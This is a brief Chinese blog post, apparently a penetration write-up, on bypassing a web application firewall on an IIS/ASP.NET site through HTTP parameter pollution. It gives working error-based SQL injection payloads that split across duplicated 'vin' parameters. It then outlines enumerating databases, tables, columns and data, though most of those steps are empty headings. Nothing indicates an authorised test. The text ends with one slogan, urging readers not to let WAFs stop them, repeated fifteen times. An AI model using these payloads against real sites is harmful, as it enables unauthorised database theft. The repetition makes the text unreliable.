一次简单的HPP绕WAF
利用代码中的一段错误,导致我们可以利用hpp来完全绕过防御规则。
WAF绕过中,对规则与正则的绕过总是有局限性的。
直接操作
单引号报错:
闭合一波:
直接被干掉……
仔细看了下第一包的响应:asp.net,基本锁定IIS+ASP.NET,此时hpp不香吗
结合报错回显,直接构造payload:
vin=11111111111111')&vin=and+1=db_name()--+-
参数连接时用了逗号,将payload简单修改下:
vin=11111111111111&vin=')+and+1=db_name()--+-
也可以直接用注释符包含:
依次注出其它库:
注表,通过not in语句:
利用having 1=1和group by注字段:
注数据:
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。
学好技术,别再让WAF拦住你脚步。